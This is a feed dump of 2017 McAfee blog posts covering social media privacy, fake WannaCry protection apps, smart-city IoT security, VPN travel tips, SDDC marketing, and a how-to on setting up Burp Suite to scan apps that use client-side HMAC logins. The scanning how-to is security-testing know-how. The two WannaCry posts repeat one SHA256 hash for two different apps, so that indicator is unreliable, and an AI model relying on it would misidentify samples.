  • Deployment flexibility—appliances, virtual appliances, and cloud form factors—with CapEx and OpEx purchase options.
  • The powerful, layered detection approach combines in-depth static code and dynamic analysis. Proprietary static code analysis does a thorough job unpacking and unencrypting samples to expose executables in order to examine anomalies. Dynamic analysis uses sandboxing to look at malware behavior.
  • Reporting and outputs, including the ability to share indicators of compromise (IoCs) for targeted investigations.
  • The overall breadth of protection provided by the McAfee product portfolio—from endpoints to desktops to servers.
  • Additional detection engines, such as signatures, reputation, and real-time emulation, that accelerate analysis.
  • The centralized analysis device acts as a shared resource among multiple Intel Security devices.
  • Tight integration with all McAfee solutions and third-party partner products, whether directly or through the McAfee Data Exchange Layer communications fabric. This enables real-time information sharing across the entire security ecosystem when attacks and malware are detected.
  • Application of DLP technology is applied in-line to traffic by way of integration with McAfee Web Gateway.

Download your copy of the Radicati APT Protection—Market Quadrant 2017.

For information on how McAfee Advanced Threat Defense can detect and protect your enterprise from stealthy malware and zero-day threats, visit our website.

The post For Three Years Running, McAfee Advanced Threat Defense Places in Radicati’s Top Players Quadrant for APT Protection appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/optimize-operations/three-years-running-mcafee-advanced-threat-defense-places-radicatis-top-players-quadrant-apt-protection/feed/ 0
Protecting Your Privacy on Social Media https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/protecting-privacy-social-media/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/protecting-privacy-social-media/#respond Wed, 24 May 2017 17:20:06 +0000 https://securingtomorrow.mcafee.com/?p=73496 Social media sites are made for sharing, so protecting your privacy sometimes comes as an afterthought. But, the kind of information you share and whom you share it with can make a big difference between having a positive experience on social media, and putting your money and private details at risk. Sites like Facebook and …

The post Protecting Your Privacy on Social Media appeared first on McAfee Blogs.

]]>
Social media sites are made for sharing, so protecting your privacy sometimes comes as an afterthought. But, the kind of information you share and whom you share it with can make a big difference between having a positive experience on social media, and putting your money and private details at risk.

Sites like Facebook and Twitter, and social apps like Instagram, have not only become a part of our everyday lives, they have also become a popular place for hackers and scammers to create fake accounts and look for victims. They use social media sites to spread dangerous links that lead to malware, or phishing attempts. They may also impersonate people you know to request money or valuable information, or even gather your own private details to steal your identity. That’s why securing your social media accounts is so important.

Here are a few tips for protecting your privacy on some of the biggest social networks.

Facebook

The social media giant has recently put more effort into helping users secure their account. Their Privacy Checkup tool allows you to review and adjust your privacy settings to control who sees your posts, what you share, and how your profile looks to other people, among other options.

Facebook occasionally prompts you to go through a Privacy Checkup, but you can do it manually at any time. Consider selecting the highest security settings, including blocking messages from strangers and restricting access to your profile so that “Friends Only” can see your posts and tag you.

You’ll also want to take advantage of Facebook’s extra security features, such as enabling two-factor authentication. This means that the site will verify that you are trying to login to your account by taking a second measure, like sending you a text message with a code to enter when logging into your account.

To adjust your settings, click on the lock icon at the top of any Facebook page and select “Privacy Checkup.”

Twitter

Twitter is a bit more open than Facebook, since it allows anyone to follow you (although you can block a follower later if you choose). You can improve your privacy by being careful about the information that you share. Keep personal information out of your profile and consider selecting the “Protect My Tweets” option, which allows you to filter who sees your tweets, rather than having them all go public.
Once again, make sure that no one else takes over your account by enabling two-factor authentication. You can also request verification whenever a password reset is attempted.

These settings and more can be found by clicking on the gear icon in Twitter’s upper right-hand corner.

LinkedIn

Since this is a professional networking site, people are generally more cautious about posting information about their private lives, but it’s still worth taking some time to make sure that your profile is secure. By default, anyone can see your education, photo, work experience and other details. You will want to change the settings to make sure that your profile is only visible to people you accept into your network. You can also restrict access to “connections only” when it comes to viewing your activity feed.

The site has been integrated with Twitter and other authorized applications, so you will want to ensure that your privacy isn’t being leaked onto other platforms without your knowledge. Only allow access to applications that you trust and use.

You can manage these settings by clicking on the “me” icon at the top of your LinkedIn homepage, and then selecting “Privacy & Settings.”
No matter which social networking sites you use it’s important to find a balance between sharing and engaging with others and making sure that your privacy is protected.

Here are some tips to help protect you on all social networks:

  • Be careful about how much personal information you share in the first place. Avoid posting your home address, full birth date and employer information, as well as your exact location while you are there.
  • Check your privacy settings regularly, as they often change.
  • Choose strong, unique passwords for all your accounts and take advantage of two-factor authentication.
  • Disable the sharing of location information.
  • Be wary of messages and friend requests from strangers. Never click on a link sent by someone you don’t know.
  • Block people and applications you don’t trust.
  • Think twice before taking online quizzes and surveys that ask for personal information.
  • If you no longer use a social media account, delete your information and deactivate your account.
  • Always use comprehensive security software to protect you from viruses, malware and other online threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post Protecting Your Privacy on Social Media appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/protecting-privacy-social-media/feed/ 0
Fake WannaCry Protection Apps Hit the Google Play Store https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-wannacry-protection-apps-hit-google-play-store/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-wannacry-protection-apps-hit-google-play-store/#respond Wed, 24 May 2017 16:49:21 +0000 https://securingtomorrow.mcafee.com/?p=74471 WannaCry was the ransomware attack heard around the world. It impacted more than 150 countries and infected over 250,000 devices running Windows programs. It didn’t, however, affect devices running Android software. But that’s not what some app developers want you to believe, as rogue WannaCry ‘protectors’ have begun to offer protection apps on Google Play …

The post Fake WannaCry Protection Apps Hit the Google Play Store appeared first on McAfee Blogs.

]]>
WannaCry was the ransomware attack heard around the world. It impacted more than 150 countries and infected over 250,000 devices running Windows programs. It didn’t, however, affect devices running Android software. But that’s not what some app developers want you to believe, as rogue WannaCry ‘protectors’ have begun to offer protection apps on Google Play for Android users.

First off, let’s make it clear that Android devices cannot be affected by WannaCry. This malware simply cannot harm these mobile devices. However, that hasn’t stopped some developers from taking advantage of the widespread concern and confusion to create fake apps that promise to protect Android devices from this global cyberattack.

When searching for WannaCry on Google Play, multiple new apps appear. Most of these are guides, web views, images, or text reminding us to patch Windows, as well as jokes and wallpapers. However, a few apps claim to “protect” Android devices against this threat, which, need I remind you, takes advantage of a Windows vulnerability.

One example is the “WannaCry Ransomware Protection Antivirus” offering, which the McAfee team looked into, and discovered it provides no value, offers fake features, and tricks unwary users into downloading an app loaded with ads, some of which encouraging you to install more sponsored apps.

Not to mention, the “features” offered by WannaCry Ransomware Protection are simply a repackaged malware scanner, which makes it clear the developers put little time into app development.

And though the McAfee team didn’t find any malware in these apps offering fake protection against WannaCry, it’s important to note that cybercriminals often seize the opportunity of trending topics like this—as we have seen with Flash Player for Android, Pokémon Go, Mario Run, Minecraft, etc.—to distribute malware on official apps markets. So, to make sure you stay safe in the face of fake apps, follow these tips:

-Be careful what you download. Don’t download anything for WannaCry protection unless it’s from a trusted security provider. More importantly, if the issue does not affect your type of operating system, don’t download anything you don’t need to.

-Read app reviews. Before you even download an app, make sure you head to the review section of an app store first. Take the time to read the reviews, and keep an eye out for ones that mention that the app is falsely advertised, or has had issues with security. When in doubt, avoid any app that seems remotely fishy.

-Use a comprehensive security solution. Whether the newest cyberattack is after your computer or your mobile devices, make sure you cover all of them with a comprehensive security solution, like McAfee LiveSafe.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Fake WannaCry Protection Apps Hit the Google Play Store appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-wannacry-protection-apps-hit-google-play-store/feed/ 0
Fake WannaCry ‘Protectors’ Emerge on Google Play https://securingtomorrow.mcafee.com/mcafee-labs/fake-wannacry-protectors-emerge-google-play/ https://securingtomorrow.mcafee.com/mcafee-labs/fake-wannacry-protectors-emerge-google-play/#respond Tue, 23 May 2017 23:00:28 +0000 https://securingtomorrow.mcafee.com/?p=74414 Are Android devices affected by the self-propagating ransomware WannaCry? No—because this threat exploits a vulnerability in Microsoft Windows. This malware cannot harm mobile systems. Nonetheless, some developers are taking advantage of the uproar and possible confusion to promote apps that promise to protect Android devices. While searching for “WannaCry” on GooglePlay we found several new …

The post Fake WannaCry ‘Protectors’ Emerge on Google Play appeared first on McAfee Blogs.

]]>
Are Android devices affected by the self-propagating ransomware WannaCry? No—because this threat exploits a vulnerability in Microsoft Windows. This malware cannot harm mobile systems. Nonetheless, some developers are taking advantage of the uproar and possible confusion to promote apps that promise to protect Android devices.

While searching for “WannaCry” on GooglePlay we found several new apps. Most are guides—web views, images, or text reminding us to patch Windows, as well as jokes and wallpapers. However, a few apps claim to “protect” Android devices against this Windows-only threat.

One case is the package wannacry.ransomware.protection.antivirus, which we classified as a potentially unwanted program because we see no value in an app that offers fake features and tricks unwary users into downloading an app loaded with ads.

Once the program executes it displays ads and requests that you install more sponsored apps:

All the “features” offered by WannaCry Ransomware Protection are fake; the only function in this app is a repacked scanner that can detect the presence of a few ad libraries. For that reason and in spite of the preceding warning message, it is clear the developers put little time into this development. The app even labels itself Medium Risk (SHA256 hash f9dabc8edee3ce16d5688757ae18e44bafe6de5368a82032a416c8c866686897).

On Google Play we observed another fake security solution offering similar fraudulent features: com.neufapps.antiviruswannacry (SHA256 hash f9dabc8edee3ce16d5688757ae18e44bafe6de5368a82032a416c8c866686897):

Some of these apps even have very good reviews, which tells us something about the value of online reviews:

We did not find any malware in these apps offering fake protection against WannaCry, but cybercriminals often seize the opportunity of trending topics like this—as we have seen with Flash Player for Android, Pokémon Go, Mario Run, Minecraft, etc.—to distribute malicious payloads even on official apps markets.

The McAfee Labs Mobile Malware Research team has contacted Google about removing these apps. Meanwhile users must remain aware of these kinds of fake solutions that only increase your risk.

 

The post Fake WannaCry ‘Protectors’ Emerge on Google Play appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/mcafee-labs/fake-wannacry-protectors-emerge-google-play/feed/ 0
How ‘smart cities’ push IoT cybersecurity for state and local IT https://securingtomorrow.mcafee.com/business/optimize-operations/how-smart-cities-push-iot-cybersecurity-for-state-and-local-it/ Tue, 23 May 2017 21:53:28 +0000 https://securingtomorrow.mcafee.com/?p=74433 In the last installment of this column, we talked about cyber hygiene as a way to reduce security vulnerability. Now let’s turn our focus to cybersecurity, particularly as government gears up for the coming rush of the internet of things (IoT). The threat recently became more real for state and local leaders. This past April, …

The post How ‘smart cities’ push IoT cybersecurity for state and local IT appeared first on McAfee Blogs.

]]>
In the last installment of this column, we talked about cyber hygiene as a way to reduce security vulnerability. Now let’s turn our focus to cybersecurity, particularly as government gears up for the coming rush of the internet of things (IoT).

The threat recently became more real for state and local leaders. This past April, the emergency alert system in Dallas was hacked, with hurricane warnings starting just before midnight, activating 156 emergency sirens at once – 15 times over nearly two hours.

For that and other reasons, the state and local governments are becoming more proactive in their approach to IT and cybersecurity, together spending more than the federal government. According to the research company e.Republic, state and local governments will spend some $101.3 billion on IT, with both counties and states each increasing their budget by about 1.5 percent. (By comparison, the federal government has budgeted about $90 billion.)

So cybersecurity is a top IT priority among CIOs at the state, county and city level. In general we can say that the priority has been triggered by a push toward IoT in the so-called “smart cities” development vision to integrate IoT with communications technology to better manage municipal assets.

To that extent, IoT is at a much more mature place at the state and local level than it is in the federal government or even private industry. State IT executives are more aware of IoT cybersecurity implications, because they’re dealing with industrial systems, facilities HVAC, appliances and the power grid, all of which are managed at the municipal level. To complicate matters, many connected municipal services, from public transportation to water purification are both used and in some cases managed by private companies, so potential cybersecurity threats can come from many different intrusion points at once.

The risk and expense is high. At a recent seminar by the Center for Digital Government, Oakland County CIO Phil Berolini noted that the cost of a breach can be as much as $240 per record. Multiply that by the number of breaches in a typical attack, and the costs mount rapidly. LA County recently dealt with a 750,000 records breach, Berolini noted.

James Collins, Delaware’s CIO, explained that these actual and potential threats have put cybersecurity on legislative and executive radars. Because cyber is no longer relegated to being an “IT thing,” it actually opens the door for more practical solutions, Collins said.

Across the board, the real door opener for these and other CIOs is any discussion with the IT community on “baking in” cybersecurity into technology solutions. When cybersecurity maintenance costs are rolled into the tools that are actually included in IT budgeting, there’s more bang for the buck on infrastructure spending, with a higher level of security resilience. Because state and local IT leaders are still getting their arms around on-premise and off-premise cybersecurity, baked in defensive tools are especially valuable in IT purchases.

Some advice for the IT vendor community: slow down

The accelerated interest in IoT in state and local government has led to something of a gold rush among technology companies, who are often guilty of prospecting in that market in all the wrong ways. Many times overzealous technology salespeople make calls without enough research, or promise things that are of no importance.

Wanda Gibson, CTO for Fairfax County, urged the vendor community to pay better attention to published information regarding government IT priorities and budget. “Do your research,” she said, and talk to the other county departments to know what matters most.

The all-too-common sales strategy of blanket emails requesting a first meeting out of the blue are just plain “creepy” for Travis County CIO Tanya Acevedo. Calls like that do nothing to help Acevedo sell technology up the ladder in the county. A softer approach is better, with roundtables or symposiums providing good information without feeling like salespeople are trying to shoot ducks in a barrel.

The slow, measured approach seems to be the right way to get traction in the state and local technology community. As Oakland’s Berolini explains, leading with the gold-plated solution is a “turn-off” for any future discussions. Berolini, like most IT leaders, advocates a consultative approach where vendors work to understand problems, rather than trying to force fit a solution blindly.

It’s a balancing act, clearly, between government leaders working to implement IoT technology to better serve citizens quickly while ensuring that this rapid pace doesn’t introduce more security problems than it’s worth. While the vendor community is a valuable resource to address potential problems, they’re doing no one any favors by pushing their way into the process. CIOs have enough on their hands without having to fend off the advances of an under-informed partner.

With enough shared background and experience, the IoT phenomenon will take off for state and local government – and will provide valuable insight all the way up to the federal level.

 

This article was written by Lloyd McCoy Jr. From CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post How ‘smart cities’ push IoT cybersecurity for state and local IT appeared first on McAfee Blogs.

]]>
6 Ways to ‘Just Say No’ to the Time Wasting Habit of Digital Digging https://securingtomorrow.mcafee.com/consumer/family-safety/6-ways-just-say-no-obsessive-digital-digging/ https://securingtomorrow.mcafee.com/consumer/family-safety/6-ways-just-say-no-obsessive-digital-digging/#respond Tue, 23 May 2017 14:00:12 +0000 https://securingtomorrow.mcafee.com/?p=74281 If an app existed that tracked the minutes we spent looking at other people’s social profiles online (much like a Fitbit that tracks physical steps), some of us might quietly slip into a state shock. Call it what you will — creeping, Facebook stalking, digital digging — it’s a habit that could be sucking up …

The post 6 Ways to ‘Just Say No’ to the Time Wasting Habit of Digital Digging appeared first on McAfee Blogs.

]]>
digital diggingIf an app existed that tracked the minutes we spent looking at other people’s social profiles online (much like a Fitbit that tracks physical steps), some of us might quietly slip into a state shock.

Call it what you will — creeping, Facebook stalking, digital digging — it’s a habit that could be sucking up your time and even your life. Sometimes it’s an innocent click on Facebook to see what an old friend is up to. Only that click might lead to an interesting comment left by a mutual friend you totally forgot about, which inspires a few more clicks that might lead to several other pages and before long you are in the digital equivalent of Istanbul with no idea how you got there.

Other clicks aren’t so innocent, especially when it comes to tweens and teens. Young love has the internet buzzing with profile hopping and ex-stalking. On the agenda today: Who is dating who and who is in whose story? Who is liking a certain somebody’s photos or tweets just a little too much lately? What started as a simple look can soon turn into a full-blown ex- or friends-of-new-girl-or-guy-of-ex, obsession.

Not a great way to spend a day. And with summer coming up, digital digging is not a good way to spend a whole lot of days.

We’ve All Done Itdigital digging

Creeping isn’t just for kids; adults do their fair share. The more independent kids become, the less personal information they share, which prompts parents to digitally piece together their kids’ social life. On our agenda today: Who are they hanging out with? What kind of kids are they? Where did they really go on Friday night?

Yes, parents (who admit it or not) have also become quite adept at social creeping. For teens and adults alike, If you’ve ever dabbled in the excessive zone or watched someone else obsess, you know it can be emotionally and physically exhausting and render zero benefits.

However, the knowledge that excessive digital digging is not healthy or productive rarely stops someone on the hunt. So what can you do to encourage your teenager (or even yourself) to ween and eventually quit this counterproductive hobby? Here are a few things.

Six ways to ‘just say no’ to digital digging

1. Relationship over rules. Your first tool in equipping your child is building a good relationship. From there, just about anything on your parenting docket is possible. So, every day, in big and small ways, be sure that relationship (not controlling behavior) is your #1 parenting goal. Listen. Empathize. Be a positive advocate for your tween or teen child (as opposed to a critical, demanding authority figure). Remember: Balance is key. There will be a season to be your child’s best friend, but that’s not the goal just yet.

If you want to get a taste of how even the best-intentioned parents can distort creeping, just watch the movie Men, Women & Children, and you will be instantly inspired to keep your parental digital snooping in check. In the film, actor Jennifer Garner plays an overly-snooping mom who tragically misses the bigger picture of the importance of building a relationship with teens over enforcing digital rules.

2. Logic. This is always a great, albeit overlooked place to start. Slow down long digital diggingenough to understand exactly how unhealthy. A) Ask your child (or your friend or yourself if applicable) how many hours a day, a week, a month, they check on “that” person’s account. Have them add it up. They may be shocked. B) Have them list anything they’ve discovered that has made them feel good about themselves or their relationship with the other person. It’s likely that list will be short if not empty. C) Gently ask: “To what end? What is the benefit of this? How does it make you feel?” Then be quiet and let them talk.

3. Clean house. Encourage your child to unfollow, delete phone numbers, or even block a person they are trying to break ties with. This may cause panic since in your teen’s world, doing this is akin to social exile and could extinguish (in their eyes) any hope for a future reconciliation. Start small and set a goal. Ask your child to do this for two weeks. Sometimes a few weeks can restore sleep and a whole new perspective.

4. Stay busy. If you keep touching a wound, it will never heal. And if you keep creeping, your heart will never heal. Replace digging time with another activity or two. Encourage your son or daughter to get a new hobby, try out for a new sport, or do something fun with family or friends instead of troll the Internet piecing posts together.

5. Provide accountability. A heartbroken teen won’t notice it but a parent or group of friends will. If your child begins subtweeting a lot, overposting his or her fun photos, or even serial dating in a digitally competitive way, it’s a sign that healing and creeping are at odds. Step in. Respectfully and gently redirect your teen to limiting posting until his or her heart is in a healthier place.digital digging

5. Eliminate the temptation. If willpower, accountability, filtering, and logic fails, encourage (or mandate) your child to unplug for several hours a day. Turn the hours into a full day or two a week. This will likely mean you physically take their phone while they are forced to pursue other activities. Lastly, be sure to seek professional help if you see signs of internet addiction in your child or someone you know. Trust your gut; you know when a behavior has evolved to something unhealthy.

There’s not one solution that fits every situation. Creeping can be a short season, and other times, well, it can become emotionally damaging and evolve to dangerous behavior. Be flexible, try different approaches to help your child (or friend, or self) — but try. The situation will likely not remedy itself. Empathize with your child’s temptation to seek information and respect his or her healing process but keep an eye on the effect technology plays in that process.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

The post 6 Ways to ‘Just Say No’ to the Time Wasting Habit of Digital Digging appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/6-ways-just-say-no-obsessive-digital-digging/feed/ 0
How Using A VPN Could Save Your Summer https://securingtomorrow.mcafee.com/consumer/mobile-security/vpn-mms-protection/ https://securingtomorrow.mcafee.com/consumer/mobile-security/vpn-mms-protection/#respond Tue, 23 May 2017 13:00:34 +0000 https://securingtomorrow.mcafee.com/?p=74376 As summer inches closer, I begin to daydream about all the trips I’ll get to take with my family. However, whether our days are spent on the beach or walking around cities we’ve never explored, they all start the same: long-haul flights, airports, and hotels. While the Wi-Fi at the airport may claim to be …

The post How Using A VPN Could Save Your Summer appeared first on McAfee Blogs.

]]>
As summer inches closer, I begin to daydream about all the trips I’ll get to take with my family. However, whether our days are spent on the beach or walking around cities we’ve never explored, they all start the same: long-haul flights, airports, and hotels. While the Wi-Fi at the airport may claim to be secure in the network name, public Wi-Fi networks lack encryption, which scrambles the data being sent over the network. Without encryption, cybercriminals can intercept shared information and gain access to personal passwords, financials, or identity information.

Traveling often means I’ll be surrounded by (and connecting to) unfamiliar Wi-Fi networks, which makes it especially important to have a smart security solution in place for all my devices. I rely on two different tools to keep my devices and my family’s devices safe while we’re on the road. One is a personal VPN, which keeps my connections safe, even if I need to log into an insecure Wi-Fi network. Personal VPNs encrypt online activities in both public and secure Wi-Fi networks, allowing users to surf the web safely and feel at peace knowing that sensitive information will be kept private.

If you tend to spend a lot of browsing or doing work from your device while traveling, make sure to download security apps that protect your devices directly. It’s nice to have that extra layer of security, as these apps analyze the applications already installed on my phone that use my private information, and secure my data accordingly. If you’re traveling to cities where pickpocketing is common (or if you’re simply forgetful), many of the security apps also offer anti-theft protection that allow the user to back up, lock, and wipe the device remotely.

My family likes to travel to many different places in one vacation, which makes these apps perfect – since we’re bouncing between hotels or vacation rentals, we’re often surrounded by unknown networks. If your device has made an unknown connection, you’re potentially at risk of downloading fishy viruses or malware through the network. I’ve found that it’s always smart to have extra protection if your devices have a higher chance of making an insecure connection.

While these tools are important to have, we’ve learned that technology can occasionally fail us. One of the most trustworthy ways to keep your devices safe while jet-setting around this summer is to understand what an insecure Wi-Fi connection looks like. If you can determine whether the connections around you are safe or not, it will potentially save you and your loved ones a massive headache down the road. Look out for these warning signs of an insecure network, and stay away from connecting if the network looks suspicious.

  • Check the Authenticity. If there is no WPA or WP2 password for protected access, the connection is open, or unencrypted. You can check the authenticity of the network by going into internet settings and looking to see if it’s protected with a WPA or WPA2, or if it says it’s “open.”
  • HTTP vs. HTTPS? Make sure that the web pages you visit are “HTTPS” encrypted whenever possible. Do this by looking at the beginning of the URL you are accessing – if the URL starts with “HTTP”, log out – particularly if you’re doing something sensitive.
  • Pay Attention to the Warning Signs. SSL and TLS warnings are the messages that pop up in your browser when you’re in danger of connecting to an insecure connection – and it’s likely that you’ve clicked through the notification without a second thought. Take a moment to think about what you’re agreeing to before moving past the notifications next time, because it could mean you’re putting your devices in danger.
  • Be Picky. Don’t set your device to automatically connect to Wi-Fi networks. Rather, make sure your laptops, tablets, or smartphones will “forget” certain networks when you disconnect, and that they’ll only reconnect when you choose to do so manually.

From the “secure Wi-Fi” you find at the airport and airplane, to whatever you can connect to in your hotel or vacation rental, it’s smart to have a secure solution if you plan to stay connected while traveling.  Know the warning signs of an insecure Wi-Fi connection and use a personal VPN and/or mobile security solution whenever possible to keep your data as protected as possible. Have a secure summer, and happy travels!

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post How Using A VPN Could Save Your Summer appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/mobile-security/vpn-mms-protection/feed/ 0
Setting Up Automated Scanning of Apps Using Custom Authentication, Part 1 https://securingtomorrow.mcafee.com/technical-how-to/setting-automated-scanning-apps-using-custom-authentication-part-1/ https://securingtomorrow.mcafee.com/technical-how-to/setting-automated-scanning-apps-using-custom-authentication-part-1/#respond Tue, 23 May 2017 00:56:52 +0000 https://securingtomorrow.mcafee.com/?p=74179 Automated security scanning has always been a challenge for applications that implement custom authentication mechanisms. Have you ever come across a scenario in which automated tools have failed to scan an application because of an authentication failure? Most automated scanners replay login requests to authenticate when a session expires during a scan. We encountered such …

The post Setting Up Automated Scanning of Apps Using Custom Authentication, Part 1 appeared first on McAfee Blogs.

]]>
Automated security scanning has always been a challenge for applications that implement custom authentication mechanisms. Have you ever come across a scenario in which automated tools have failed to scan an application because of an authentication failure? Most automated scanners replay login requests to authenticate when a session expires during a scan.

We encountered such a scenario on a recent engagement. The application being assessed had implemented client-side encryption and hashing techniques to map the user’s credentials to a one-time string. The tool was unable to deal with this situation because it replayed login credentials to the server for authentication. This behavior may result in an unsuccessful post-authentication scan, and the results will not cover all critical areas of the application.

Further, the application can perform obfuscation at the client side using multiple techniques. The logic of converting the credentials can differ from application to application. Most financial and health-care applications implement such a strategy to defend against password compromises. In this post, we will provide an approach to scanning applications that employ such techniques.

Case study

To demonstrate, we created a sample application that creates a hash-based message authentication code (HMAC) of the user password to convert the client password into a one-time string. A unique HMAC is sent for every login request even if the same combination of username and password is used.

The server receives this HMAC from the client and calculates its own HMAC using server-side parameters to verify the value received by the client.

Sequence of steps

  • The user requests the login page from the browser.
  • The web server responds and sends the login page, which has a random key embedded in a hidden HTML field. (This random key is used to calculate the HMAC of the password.)
  • The browser renders the login page.
  • The user provides the password and submits the form. The client-side script calculates the HMAC using a random key and the password. The resulting HMAC and username is then sent to the web server in the form “HMAC(K,P1),” where K=random key and P1=password entered by user.
  • The server verifies the HMAC shared by the client and creates the session if “HMAC(K,P1)==HMAC(K,P2),” where P2 = password stored at server side.

The HMAC sequence of operations.

The application is deployed locally on port 8080:

The login screen.

To analyze the application’s behavior, let’s use an intercepting proxy tool such as Burp. The browser is configured to pass all traffic through Burp. The login page (loginPage.jsp) contains the one-time key, which is used to generate the HMAC. When the user enters their username and password and submits, the client-side script uses sha256_HMAC to convert the user’s password to HMAC.

The “loginPage.jsp” HTML source with random key.

The sample application is designed so that the HTTP request for authentication is dependent on the random key, shown in the preceding image, along with the credentials. This prevents replaying the authentication request, as we discussed earlier.

The following screenshots depict two subsequent login requests using identical user credentials.

Login request 1:

The first login request in the Burp proxy.

  • Original password: “admin”
  • Random key:  278
  • Converted password (one-time string):  /9qxmu3SEWdypUPBZi7F0hXzW3TYsvy5OXUKO3a9BXc=

Login request 2:

The second login request in Burp.

  • Original password: “admin”
  • Random key:  70
  • Converted password (one-time string):  KyFY7vOslTcFhfkZCbLmw5j76Tj4bJXdFVnHiH/FQhw=

From the preceding screens we can see that the login requests have different values for the password parameter for the same user credentials. This poses a challenge to an automated scanning tool because it cannot the login sequence.

Burp provides the Burp Extender, in which we can add our own extension code. It can be handy to overcome this issue. We will use this feature from Burp and write sample extension code that will simulate the process of the client-side encryption and hashing techniques to obtain the mapped one-time string. (For a quick introduction to writing Burp extensions, refer to http://blog.opensecurityresearch.com/2014/03/extending-burp.html.)

The extender script can be triggered whenever the session becomes invalid. The logic for checking session validity and when the extension script has to trigger can be configured using Burp’s session handling rules.

The scope for this rule can be applied on any Burp tools—Intruder, Scanner, Repeater, Proxy, etc. If the proxy tool is selected in the scope section, any request from the proxy tool will be subjected to the configured session handling rule.

To define the scope of a session handling rule, navigate to Project options->Session Handling Rules->Add/Edit ->Scope:

The scope tab and the tools for which the session handling rule will be applicable.

The technique we have shown in this post can be used with any proxy-aware automated scanning tools. Creating the Burp extension allows you to scan the application using Burp as well as other third-party tools.

Proxying the automated tool via Burp Proxy can be useful for performing robust post-authentication scans. Burp ensures that there is a valid session throughout the scanning process. This technique can perform scans using Burp tools such as Scanner or Intruder as well as third-party tools such as sqlmap. In our next post, we will explain our step-by-step procedure with the sample Burp extension code.

The post Setting Up Automated Scanning of Apps Using Custom Authentication, Part 1 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/technical-how-to/setting-automated-scanning-apps-using-custom-authentication-part-1/feed/ 0
SDDC 101: The Why, the What, and the How https://securingtomorrow.mcafee.com/business/cloud-security/sddc-101-the-why-the-what-and-the-how/ https://securingtomorrow.mcafee.com/business/cloud-security/sddc-101-the-why-the-what-and-the-how/#respond Mon, 22 May 2017 20:15:28 +0000 https://securingtomorrow.mcafee.com/?p=74334 The Software Defined Data Center (SDDC) has fundamentally changed how IT delivers infrastructure and services. SDDC rethinks traditional ways of using virtualized resources by adding virtual networks (SDN) and virtualized storage (SDS) to virtual compute as a better way to build data centers, improve security and keep costs down. The included automation and orchestration of …

The post SDDC 101: The Why, the What, and the How appeared first on McAfee Blogs.

]]>
The Software Defined Data Center (SDDC) has fundamentally changed how IT delivers infrastructure and services. SDDC rethinks traditional ways of using virtualized resources by adding virtual networks (SDN) and virtualized storage (SDS) to virtual compute as a better way to build data centers, improve security and keep costs down.

The included automation and orchestration of resources has made infrastructure operations smooth and, more importantly, has enabled security to be “built-in” to the architecture.  This is in stark contrast to traditional data centers, with physical infrastructure, where security was an afterthought.

To evaluate the impact of the move to SDDC – McAfee in partnership with VMware, sponsored the Osterman Research  “The Why, the What and the How of the Software-Defined Data Center,” which explains the nuts and bolts of SDDC, provides a deeper understanding of its value to your business as it moves to the cloud and also how it improves your security posture.

From the research, we see that while many organizations have virtualized their servers, they haven’t yet embraced the full virtualization of a software-defined data center:

Figure 1

Percentage of Servers that are Virtualized
2017 and 2019

Source: Osterman Research, Inc.

And while only 3% have moved to SDDC, there is great intention to do so:

Figure 2

“Does your organization plan to transform your data center(s) into Software-Defined Data Centers? 

Source: Osterman Research, Inc.

So, Why SDDC?

From our survey respondent confirmed what we believed- an SDDC improves operational efficiency, creates a more secure data center and reduces costs.

Reasons That Organizations Want to Move to an SDDC 

Source: Osterman Research, Inc.

Source: Osterman Research, Inc.

These business benefits help organizations as they transition their infrastructure into a cloud-ready agile environment for both private and hybrid cloud.

Probably the greatest benefit of an SDDC is its ability to transform the data center from being a slow-to-support-the-business department of saying “no” to an agile business driver, where the department says “yes” to quickly deploying applications and services, truly helping to grow the business objectives of your company. With the agile infrastructure of an SDDC, you can elastically scale as demand on your applications increases. An SDDC allows you to extend and manage applications across private and public clouds so you can optimize based on your current and evolving needs.

How does SDDC Work and Improve Security?

With SDDC, the three main pillars of datacenter – compute, networking and storage are virtualized. This virtualized environment provides high degree of automation with agility. Traditionally, virtualized architectures are drawn by expedience, which means that managing a virtualized data center required lots of interaction with many moving parts. However, these moving parts are not integrated and do not have the understanding that they had been virtualized. SDDC rethinks and redraws functional boundaries, by moving intelligence from lower layers up into the VM platform, thus improving automation, management and security.

This new virtual and dynamic data center architecture introduces new security and compliance considerations as well. You will need complete visibility into all your workloads as they are provisioned so you can know what needs to be secured. In addition, as you now have east-west traffic flows between your VMs, inspection of that traffic is key. McAfee Data Center and Cloud Defense solutions help secure the new infrastructure of an SDDC, all within the same management as your traditional security. Integrated, dynamic protection technologies match the agility of your new data center infrastructure to protect against advanced threats and maintain compliance, including the ability to monitor east-west traffic flows inside the SDDC environment.

The bottom line? Transforming your traditional data center into a SDDC offers numerous benefits, including significant improvements to data center security. The SDDC is ready for prime-time and offers substantial advantages over traditional data center approaches. Are you ready to grab hold of the opportunity?

To learn more, download the whitepaper “The Why, the What and the How of the Software-Defined Data Center.”

The post SDDC 101: The Why, the What, and the How appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/sddc-101-the-why-the-what-and-the-how/feed/ 0
